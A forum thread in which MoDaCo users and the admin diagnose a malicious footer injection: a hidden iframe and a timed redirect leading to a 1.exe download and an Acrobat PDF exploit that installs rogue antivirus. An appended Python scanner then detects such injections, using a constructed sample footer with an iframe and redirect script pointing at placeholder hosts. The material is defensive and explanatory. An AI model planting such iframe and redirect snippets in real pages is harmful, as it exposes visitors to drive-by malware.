
Adware / spyware in modaco adds?

13 posts in this topic

Posted · Report post

See screen dump. Wasn't logged in at the time. Syntax struck me as odd. Upon clicking 'no' it tried downloading anyway but my firewall stopped it....

IE6, fully patched, doing a full scan just in case :-(

Nowhere's safe on the t'interweb eh?

M.S

post-254928-1235255379_thumb.jpg


Posted · Report post

More info:

The setTimeout function tells the browser to run the function ‘vparivatel’ in 60 seconds. This function will then redirect the browser to the page vparivatel.php on the same website. This then asks the user to download the file 1.exe.

This adds an element to the current page containing a pdf object. The pdf file that is loaded by this object attempts to exploit a vulnerability in Adobe Acrobat and Acrobat reader. This vulnerability affects versions prior to 8.1.2. If the exploit is successful it will download and execute the 1.exe file without requiring any interaction from the user.

The 1.exe file downloads and installs the rogue antivirus program Spyware Guard 2008. This program pretends to scan the system and falsely reports that the system is infected. In order to remove these ‘threats’ the user must pay for the full version. One clue for the user that this is not legitimate security software is the misspelling of 'security' in the tab on the left hand side.


Posted (edited) · Report post

Yea my AVG is going nuts each time I visit the forum. It is saying "Exploit Link to known exploit site (type 502)" each time I view any MoDaCo page.... is this a false positive or is there something here?

EDIT:

Just saw your second post. I did notice it asked me to download a PDF! Luckily I use FoxIt not Adobe Reader so hopefully I'm ok.

Gonna do a MalwareBytes scan just in case.

Thanks!

Edited by TheDrizzle

Posted · Report post

Investigating...

P


Posted · Report post

Should be gone now, continuing diagnosis...

P


Posted · Report post

On the lappy Kaspersky found it as soon as I clicked on the site :(

Windows Onecare did not even flinch and let the little beatie screw up my main PC.


Posted · Report post

> Windows Onecare did not even flinch and let the little beatie screw up my main PC.

Should only be an issue if you allow the redirect and file install by clicking on it, although *any* action in the dialogue box (even clicking 'no') prompts for the download. I'd suggest you reset your browser security settings to default? My laptop has a corporate Norton on there but I use OneCare on another machine and it's usually very good.

M.S


Posted · Report post

Did not get that far, the whole hard drive went into overtime and the PC went as fast as an Orange ROM :(

Using FF and all security settings will be the default as I generally do not touch them, the same applies to Onecare.

I've found Onecare to be good in the past but then again after this just how good has it really been?

Some guys I know in the security business will only touch Kaspersky but as they say most threats will technically get through until someone reports them.

Now the pc seems to hang on a virus check, third time lucky...


Posted · Report post

> Did not get that far, the whole hard drive went into overtime and the PC went as fast as an Orange ROM :(
>
> Using FF and all security settings will be the default as I generally do not touch them, the same applies to Onecare.
>
> I've found Onecare to be good in the past but then again after this just how good has it really been?
>
> Some guys I know in the security business will only touch Kaspersky but as they say most threats will technically get through until someone reports them.
>
> Now the pc seems to hang on a virus check, third time lucky...

Check the pop up blocker settings in firefox.

http://support.mozilla.com/en-US/kb/Pop-up+blocker

There are options to handle different file types differently. As this exploit uses a .pdf file it may be you have settings that allow downloads of PDFs (which are usually safe and inert....)

Also from older posts on t'interweb (June 08) firefox automatically downloads stuff into a cache:

http://alanedwardes.com/posts/firefox-auto...-security-flaw/

"WTF? So does Firefox download stuff for you now? So it turns out it does. When I looked in the OneCare quarantine it displayed the path that the virus was found in. So, I was a bit worried when it turned out that the file was found in the Firefox cache folder. Interesting."

Which version of Firefox is it? There are/were multiple mutterings about incompatibility with OneCare for older versions. As OneCare has now been discontinued (as some aspects are going to be incorporated in future free offerings from M$) I wouldn't expect too much development with the latest version of Firefox etc. Shame as some of the advanced functions in OneCare are very good.

I've always given Kaspersky a bit of a wide berth based on F-secure using their engine and being so poor at doing pretty much anything. Everyone has their own favourite and there will be fans and haters of every solution. Norton's 2009 suite has been re-written to improve system performance and is supposedly quite good now.

Kaspersky also uninstalls the very good, free, spybot s&d for no real reason...

http://forum.kaspersky.com/index.php?showt...mp;#entry768506

M.S


Posted · Report post

> Should be gone now, continuing diagnosis...
>
> P

Still doing it - look at the URL it's trying to open, same as the last one, crashed my browser window this time though. :(

More diagnosis needed methinks?

M.S

post-254928-1235325872_thumb.jpg


Posted · Report post

OK, looks like the owner of caribfinancing has found out about their security issue and is now redirecting calls to that page to Google... which means, due to the iframe remaining in every page footer, every MoDaCo page is being redirected to Google! (unless you hit stop in time...).

Virus issue appears to have been resolved but obviously the site just needs tweaking back, watch this space...


Posted · Report post

Should be all sorted now, nasty hackers... :(

P


Posted · Report post

Hi there, I have this same problem on my site. I've deleted it many times from skins but it keeps coming back. Please can you tell me how to get rid of it altogether?

many thanks

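The injection this thread describes has two visible parts: a hidden iframe left in every page footer, and a script that uses setTimeout to call a function (named 'vparivatel' in the second post) after 60 seconds, which then sends the browser to vparivatel.php and the 1.exe download. Both leave patterns in page source and in forum skin/template files that can be searched for, which is the question the last post asks. The scanner below is an added example, not code from this thread or from MoDaCo; the site hostname, the attacker hostname and the sample footer it scans are constructed placeholders.

```python
"""Scanner for injected footer code of the kind described in this thread.

Added example, not code from the thread or from MoDaCo. It flags:
  * <iframe> elements that are hidden (zero-sized or display:none) and point
    at a host other than the site's own;
  * setTimeout() calls scheduling a named function (the thread's 'vparivatel');
  * assignments to window.location / document.location ending in .php or .exe.
All hostnames, paths and the sample footer below are constructed placeholders.
"""
import re
import sys
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "forum.example.invalid"  # assumption: the forum's own hostname

# Constructed sample of an injected footer; not a copy of the real injection.
SAMPLE_FOOTER = """
<div id="footer">&copy; example forum</div>
<iframe src="http://attacker.invalid/ad.php" width="0" height="0"
        style="display:none"></iframe>
<script>
function vparivatel() { window.location = "vparivatel.php"; }
setTimeout(vparivatel, 60000);
</script>
"""

TIMEOUT_RE = re.compile(r"setTimeout\s*\(\s*(?P<fn>\w+)\s*,\s*(?P<ms>\d+)\s*\)")
LOCATION_RE = re.compile(
    r"""(?:window\.|document\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _dimension(attrs, name):
    """Leading integer of a width/height attribute, or None if absent."""
    value = attrs.get(name)
    match = re.match(r"\s*(\d+)", value) if value is not None else None
    return int(match.group(1)) if match else None


def is_hidden(attrs):
    """True for zero/one-pixel frames or frames hidden via inline style."""
    style = attrs.get("style", "").replace(" ", "").lower()
    width, height = _dimension(attrs, "width"), _dimension(attrs, "height")
    tiny = (width is not None and width <= 1) or (height is not None and height <= 1)
    return tiny or "display:none" in style or "visibility:hidden" in style


def is_external(src, site_host=SITE_HOST):
    """True when the src has a hostname that is not the site's own."""
    host = urlparse(src).hostname
    return bool(host) and host.lower() != site_host.lower()


def scan_html(html, site_host=SITE_HOST):
    """Return a list of (kind, detail) findings for one HTML document."""
    findings = []
    collector = IframeCollector()
    collector.feed(html)
    for frame in collector.iframes:
        src = frame.get("src", "")
        if is_external(src, site_host) and is_hidden(frame):
            findings.append(("hidden-external-iframe", src))
    for m in TIMEOUT_RE.finditer(html):
        seconds = int(m.group("ms")) // 1000
        findings.append(("timed-redirect", f"{m.group('fn')} after {seconds}s"))
    for m in LOCATION_RE.finditer(html):
        if m.group(1).lower().endswith((".php", ".exe")):
            findings.append(("location-change", m.group(1)))
    return findings


def scan_files(paths, site_host=SITE_HOST):
    """Scan saved pages or skin/template files; returns {path: findings}."""
    results = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            hits = scan_html(fh.read(), site_host)
        if hits:
            results[path] = hits
    return results


if __name__ == "__main__":
    # No arguments: scan the constructed sample; otherwise scan the given files.
    if len(sys.argv) == 1:
        report = {"<sample>": scan_html(SAMPLE_FOOTER)}
    else:
        report = scan_files(sys.argv[1:])
    for path, hits in report.items():
        for kind, detail in hits:
            print(f"{path}: {kind}: {detail}")
```

Run it with the paths of your skin or template files (the files that render the page footer) to find where the iframe and script are being written from; a hit that keeps returning after you delete it from a skin points at the mechanism that rewrites the file, not at the skin itself.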


MoDaCo is part of the MoDaCo.network, © Paul O'Brien 2002-2015. MoDaCo uses IntelliTxt technology.